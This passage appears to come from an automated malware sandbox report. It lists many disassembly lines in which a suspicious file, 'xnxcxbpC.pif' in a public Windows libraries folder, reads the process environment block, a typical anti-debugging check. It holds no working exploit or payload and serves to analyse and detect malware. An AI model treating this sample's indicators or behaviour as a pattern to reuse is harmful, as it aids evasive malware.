Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB0185 mov eax, dword ptr fs:[00000030h]	5_2_22AB0185
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF019F mov eax, dword ptr fs:[00000030h]	5_2_22AF019F
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF019F mov eax, dword ptr fs:[00000030h]	5_2_22AF019F
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF019F mov eax, dword ptr fs:[00000030h]	5_2_22AF019F
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF019F mov eax, dword ptr fs:[00000030h]	5_2_22AF019F
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6A197 mov eax, dword ptr fs:[00000030h]	5_2_22A6A197
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6A197 mov eax, dword ptr fs:[00000030h]	5_2_22A6A197
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6A197 mov eax, dword ptr fs:[00000030h]	5_2_22A6A197
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B14180 mov eax, dword ptr fs:[00000030h]	5_2_22B14180
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B14180 mov eax, dword ptr fs:[00000030h]	5_2_22B14180
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B2C188 mov eax, dword ptr fs:[00000030h]	5_2_22B2C188
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B2C188 mov eax, dword ptr fs:[00000030h]	5_2_22B2C188
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B461E5 mov eax, dword ptr fs:[00000030h]	5_2_22B461E5
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA01F8 mov eax, dword ptr fs:[00000030h]	5_2_22AA01F8
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B361C3 mov eax, dword ptr fs:[00000030h]	5_2_22B361C3
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B361C3 mov eax, dword ptr fs:[00000030h]	5_2_22B361C3
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEE1D0 mov eax, dword ptr fs:[00000030h]	5_2_22AEE1D0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEE1D0 mov eax, dword ptr fs:[00000030h]	5_2_22AEE1D0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEE1D0 mov ecx, dword ptr fs:[00000030h]	5_2_22AEE1D0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEE1D0 mov eax, dword ptr fs:[00000030h]	5_2_22AEE1D0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEE1D0 mov eax, dword ptr fs:[00000030h]	5_2_22AEE1D0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA0124 mov eax, dword ptr fs:[00000030h]	5_2_22AA0124
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B30115 mov eax, dword ptr fs:[00000030h]	5_2_22B30115
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1A118 mov ecx, dword ptr fs:[00000030h]	5_2_22B1A118
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1A118 mov eax, dword ptr fs:[00000030h]	5_2_22B1A118
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1A118 mov eax, dword ptr fs:[00000030h]	5_2_22B1A118
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1A118 mov eax, dword ptr fs:[00000030h]	5_2_22B1A118
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1E10E mov eax, dword ptr fs:[00000030h]	5_2_22B1E10E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1E10E mov ecx, dword ptr fs:[00000030h]	5_2_22B1E10E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1E10E mov eax, dword ptr fs:[00000030h]	5_2_22B1E10E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1E10E mov eax, dword ptr fs:[00000030h]	5_2_22B1E10E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1E10E mov ecx, dword ptr fs:[00000030h]	5_2_22B1E10E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1E10E mov eax, dword ptr fs:[00000030h]	5_2_22B1E10E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1E10E mov eax, dword ptr fs:[00000030h]	5_2_22B1E10E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1E10E mov ecx, dword ptr fs:[00000030h]	5_2_22B1E10E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1E10E mov eax, dword ptr fs:[00000030h]	5_2_22B1E10E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1E10E mov ecx, dword ptr fs:[00000030h]	5_2_22B1E10E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B08158 mov eax, dword ptr fs:[00000030h]	5_2_22B08158
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6C156 mov eax, dword ptr fs:[00000030h]	5_2_22A6C156
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A76154 mov eax, dword ptr fs:[00000030h]	5_2_22A76154
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A76154 mov eax, dword ptr fs:[00000030h]	5_2_22A76154
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B04144 mov eax, dword ptr fs:[00000030h]	5_2_22B04144
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B04144 mov eax, dword ptr fs:[00000030h]	5_2_22B04144
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B04144 mov ecx, dword ptr fs:[00000030h]	5_2_22B04144
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B04144 mov eax, dword ptr fs:[00000030h]	5_2_22B04144
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B04144 mov eax, dword ptr fs:[00000030h]	5_2_22B04144
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAC6A6 mov eax, dword ptr fs:[00000030h]	5_2_22AAC6A6
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA66B0 mov eax, dword ptr fs:[00000030h]	5_2_22AA66B0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A74690 mov eax, dword ptr fs:[00000030h]	5_2_22A74690
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A74690 mov eax, dword ptr fs:[00000030h]	5_2_22A74690
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEE6F2 mov eax, dword ptr fs:[00000030h]	5_2_22AEE6F2
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEE6F2 mov eax, dword ptr fs:[00000030h]	5_2_22AEE6F2
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEE6F2 mov eax, dword ptr fs:[00000030h]	5_2_22AEE6F2
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEE6F2 mov eax, dword ptr fs:[00000030h]	5_2_22AEE6F2
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF06F1 mov eax, dword ptr fs:[00000030h]	5_2_22AF06F1
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF06F1 mov eax, dword ptr fs:[00000030h]	5_2_22AF06F1
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAA6C7 mov ebx, dword ptr fs:[00000030h]	5_2_22AAA6C7
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAA6C7 mov eax, dword ptr fs:[00000030h]	5_2_22AAA6C7
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA6620 mov eax, dword ptr fs:[00000030h]	5_2_22AA6620
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA8620 mov eax, dword ptr fs:[00000030h]	5_2_22AA8620
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7262C mov eax, dword ptr fs:[00000030h]	5_2_22A7262C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8E627 mov eax, dword ptr fs:[00000030h]	5_2_22A8E627
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8260B mov eax, dword ptr fs:[00000030h]	5_2_22A8260B
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8260B mov eax, dword ptr fs:[00000030h]	5_2_22A8260B
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8260B mov eax, dword ptr fs:[00000030h]	5_2_22A8260B
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8260B mov eax, dword ptr fs:[00000030h]	5_2_22A8260B
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8260B mov eax, dword ptr fs:[00000030h]	5_2_22A8260B
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8260B mov eax, dword ptr fs:[00000030h]	5_2_22A8260B
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8260B mov eax, dword ptr fs:[00000030h]	5_2_22A8260B
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEE609 mov eax, dword ptr fs:[00000030h]	5_2_22AEE609
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2619 mov eax, dword ptr fs:[00000030h]	5_2_22AB2619
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAA660 mov eax, dword ptr fs:[00000030h]	5_2_22AAA660
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAA660 mov eax, dword ptr fs:[00000030h]	5_2_22AAA660
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B3866E mov eax, dword ptr fs:[00000030h]	5_2_22B3866E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B3866E mov eax, dword ptr fs:[00000030h]	5_2_22B3866E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA2674 mov eax, dword ptr fs:[00000030h]	5_2_22AA2674
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A8C640 mov eax, dword ptr fs:[00000030h]	5_2_22A8C640
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A707AF mov eax, dword ptr fs:[00000030h]	5_2_22A707AF
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B247A0 mov eax, dword ptr fs:[00000030h]	5_2_22B247A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1678E mov eax, dword ptr fs:[00000030h]	5_2_22B1678E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A927ED mov eax, dword ptr fs:[00000030h]	5_2_22A927ED
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A927ED mov eax, dword ptr fs:[00000030h]	5_2_22A927ED
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A927ED mov eax, dword ptr fs:[00000030h]	5_2_22A927ED
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AFE7E1 mov eax, dword ptr fs:[00000030h]	5_2_22AFE7E1
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A747FB mov eax, dword ptr fs:[00000030h]	5_2_22A747FB
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A747FB mov eax, dword ptr fs:[00000030h]	5_2_22A747FB
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7C7C0 mov eax, dword ptr fs:[00000030h]	5_2_22A7C7C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF07C3 mov eax, dword ptr fs:[00000030h]	5_2_22AF07C3
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAC720 mov eax, dword ptr fs:[00000030h]	5_2_22AAC720
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAC720 mov eax, dword ptr fs:[00000030h]	5_2_22AAC720
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA273C mov eax, dword ptr fs:[00000030h]	5_2_22AA273C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA273C mov ecx, dword ptr fs:[00000030h]	5_2_22AA273C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA273C mov eax, dword ptr fs:[00000030h]	5_2_22AA273C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEC730 mov eax, dword ptr fs:[00000030h]	5_2_22AEC730
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAC700 mov eax, dword ptr fs:[00000030h]	5_2_22AAC700
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A70710 mov eax, dword ptr fs:[00000030h]	5_2_22A70710
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA0710 mov eax, dword ptr fs:[00000030h]	5_2_22AA0710
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A78770 mov eax, dword ptr fs:[00000030h]	5_2_22A78770
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]	5_2_22A80770
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]	5_2_22A80770
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]	5_2_22A80770
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]	5_2_22A80770
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]	5_2_22A80770
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]	5_2_22A80770
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]	5_2_22A80770
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]	5_2_22A80770
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]	5_2_22A80770
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]	5_2_22A80770
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]	5_2_22A80770
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80770 mov eax, dword ptr fs:[00000030h]	5_2_22A80770
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA674D mov esi, dword ptr fs:[00000030h]	5_2_22AA674D
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA674D mov eax, dword ptr fs:[00000030h]	5_2_22AA674D
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA674D mov eax, dword ptr fs:[00000030h]	5_2_22AA674D
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AFE75D mov eax, dword ptr fs:[00000030h]	5_2_22AFE75D
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A70750 mov eax, dword ptr fs:[00000030h]	5_2_22A70750
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF4755 mov eax, dword ptr fs:[00000030h]	5_2_22AF4755
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2750 mov eax, dword ptr fs:[00000030h]	5_2_22AB2750
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB2750 mov eax, dword ptr fs:[00000030h]	5_2_22AB2750
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A764AB mov eax, dword ptr fs:[00000030h]	5_2_22A764AB
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA44B0 mov ecx, dword ptr fs:[00000030h]	5_2_22AA44B0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AFA4B0 mov eax, dword ptr fs:[00000030h]	5_2_22AFA4B0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B2A49A mov eax, dword ptr fs:[00000030h]	5_2_22B2A49A
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A704E5 mov ecx, dword ptr fs:[00000030h]	5_2_22A704E5
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6C427 mov eax, dword ptr fs:[00000030h]	5_2_22A6C427
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6E420 mov eax, dword ptr fs:[00000030h]	5_2_22A6E420
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6E420 mov eax, dword ptr fs:[00000030h]	5_2_22A6E420
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6E420 mov eax, dword ptr fs:[00000030h]	5_2_22A6E420
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF6420 mov eax, dword ptr fs:[00000030h]	5_2_22AF6420
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF6420 mov eax, dword ptr fs:[00000030h]	5_2_22AF6420
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF6420 mov eax, dword ptr fs:[00000030h]	5_2_22AF6420
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF6420 mov eax, dword ptr fs:[00000030h]	5_2_22AF6420
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF6420 mov eax, dword ptr fs:[00000030h]	5_2_22AF6420
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF6420 mov eax, dword ptr fs:[00000030h]	5_2_22AF6420
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF6420 mov eax, dword ptr fs:[00000030h]	5_2_22AF6420
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAA430 mov eax, dword ptr fs:[00000030h]	5_2_22AAA430
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA8402 mov eax, dword ptr fs:[00000030h]	5_2_22AA8402
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA8402 mov eax, dword ptr fs:[00000030h]	5_2_22AA8402
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA8402 mov eax, dword ptr fs:[00000030h]	5_2_22AA8402
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AFC460 mov ecx, dword ptr fs:[00000030h]	5_2_22AFC460
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9A470 mov eax, dword ptr fs:[00000030h]	5_2_22A9A470
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9A470 mov eax, dword ptr fs:[00000030h]	5_2_22A9A470
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9A470 mov eax, dword ptr fs:[00000030h]	5_2_22A9A470
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B2A456 mov eax, dword ptr fs:[00000030h]	5_2_22B2A456
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAE443 mov eax, dword ptr fs:[00000030h]	5_2_22AAE443
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAE443 mov eax, dword ptr fs:[00000030h]	5_2_22AAE443
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAE443 mov eax, dword ptr fs:[00000030h]	5_2_22AAE443
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAE443 mov eax, dword ptr fs:[00000030h]	5_2_22AAE443
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAE443 mov eax, dword ptr fs:[00000030h]	5_2_22AAE443
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAE443 mov eax, dword ptr fs:[00000030h]	5_2_22AAE443
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAE443 mov eax, dword ptr fs:[00000030h]	5_2_22AAE443
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAE443 mov eax, dword ptr fs:[00000030h]	5_2_22AAE443
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9245A mov eax, dword ptr fs:[00000030h]	5_2_22A9245A
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6645D mov eax, dword ptr fs:[00000030h]	5_2_22A6645D
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF05A7 mov eax, dword ptr fs:[00000030h]	5_2_22AF05A7
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF05A7 mov eax, dword ptr fs:[00000030h]	5_2_22AF05A7
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF05A7 mov eax, dword ptr fs:[00000030h]	5_2_22AF05A7
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A945B1 mov eax, dword ptr fs:[00000030h]	5_2_22A945B1
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A945B1 mov eax, dword ptr fs:[00000030h]	5_2_22A945B1
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA4588 mov eax, dword ptr fs:[00000030h]	5_2_22AA4588
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A72582 mov eax, dword ptr fs:[00000030h]	5_2_22A72582
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A72582 mov ecx, dword ptr fs:[00000030h]	5_2_22A72582
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAE59C mov eax, dword ptr fs:[00000030h]	5_2_22AAE59C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A725E0 mov eax, dword ptr fs:[00000030h]	5_2_22A725E0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAC5ED mov eax, dword ptr fs:[00000030h]	5_2_22AAC5ED
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAC5ED mov eax, dword ptr fs:[00000030h]	5_2_22AAC5ED
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9E5E7 mov eax, dword ptr fs:[00000030h]	5_2_22A9E5E7
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9E5E7 mov eax, dword ptr fs:[00000030h]	5_2_22A9E5E7
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9E5E7 mov eax, dword ptr fs:[00000030h]	5_2_22A9E5E7
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9E5E7 mov eax, dword ptr fs:[00000030h]	5_2_22A9E5E7
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9E5E7 mov eax, dword ptr fs:[00000030h]	5_2_22A9E5E7
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9E5E7 mov eax, dword ptr fs:[00000030h]	5_2_22A9E5E7
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9E5E7 mov eax, dword ptr fs:[00000030h]	5_2_22A9E5E7
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9E5E7 mov eax, dword ptr fs:[00000030h]	5_2_22A9E5E7
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAE5CF mov eax, dword ptr fs:[00000030h]	5_2_22AAE5CF
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAE5CF mov eax, dword ptr fs:[00000030h]	5_2_22AAE5CF
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A765D0 mov eax, dword ptr fs:[00000030h]	5_2_22A765D0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAA5D0 mov eax, dword ptr fs:[00000030h]	5_2_22AAA5D0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAA5D0 mov eax, dword ptr fs:[00000030h]	5_2_22AAA5D0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9E53E mov eax, dword ptr fs:[00000030h]	5_2_22A9E53E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9E53E mov eax, dword ptr fs:[00000030h]	5_2_22A9E53E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9E53E mov eax, dword ptr fs:[00000030h]	5_2_22A9E53E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9E53E mov eax, dword ptr fs:[00000030h]	5_2_22A9E53E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9E53E mov eax, dword ptr fs:[00000030h]	5_2_22A9E53E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80535 mov eax, dword ptr fs:[00000030h]	5_2_22A80535
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80535 mov eax, dword ptr fs:[00000030h]	5_2_22A80535
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80535 mov eax, dword ptr fs:[00000030h]	5_2_22A80535
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80535 mov eax, dword ptr fs:[00000030h]	5_2_22A80535
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80535 mov eax, dword ptr fs:[00000030h]	5_2_22A80535
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80535 mov eax, dword ptr fs:[00000030h]	5_2_22A80535
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B06500 mov eax, dword ptr fs:[00000030h]	5_2_22B06500
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B44500 mov eax, dword ptr fs:[00000030h]	5_2_22B44500
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B44500 mov eax, dword ptr fs:[00000030h]	5_2_22B44500
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B44500 mov eax, dword ptr fs:[00000030h]	5_2_22B44500
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B44500 mov eax, dword ptr fs:[00000030h]	5_2_22B44500
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B44500 mov eax, dword ptr fs:[00000030h]	5_2_22B44500
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B44500 mov eax, dword ptr fs:[00000030h]	5_2_22B44500
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B44500 mov eax, dword ptr fs:[00000030h]	5_2_22B44500
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA656A mov eax, dword ptr fs:[00000030h]	5_2_22AA656A
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA656A mov eax, dword ptr fs:[00000030h]	5_2_22AA656A
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA656A mov eax, dword ptr fs:[00000030h]	5_2_22AA656A
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A78550 mov eax, dword ptr fs:[00000030h]	5_2_22A78550
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A78550 mov eax, dword ptr fs:[00000030h]	5_2_22A78550
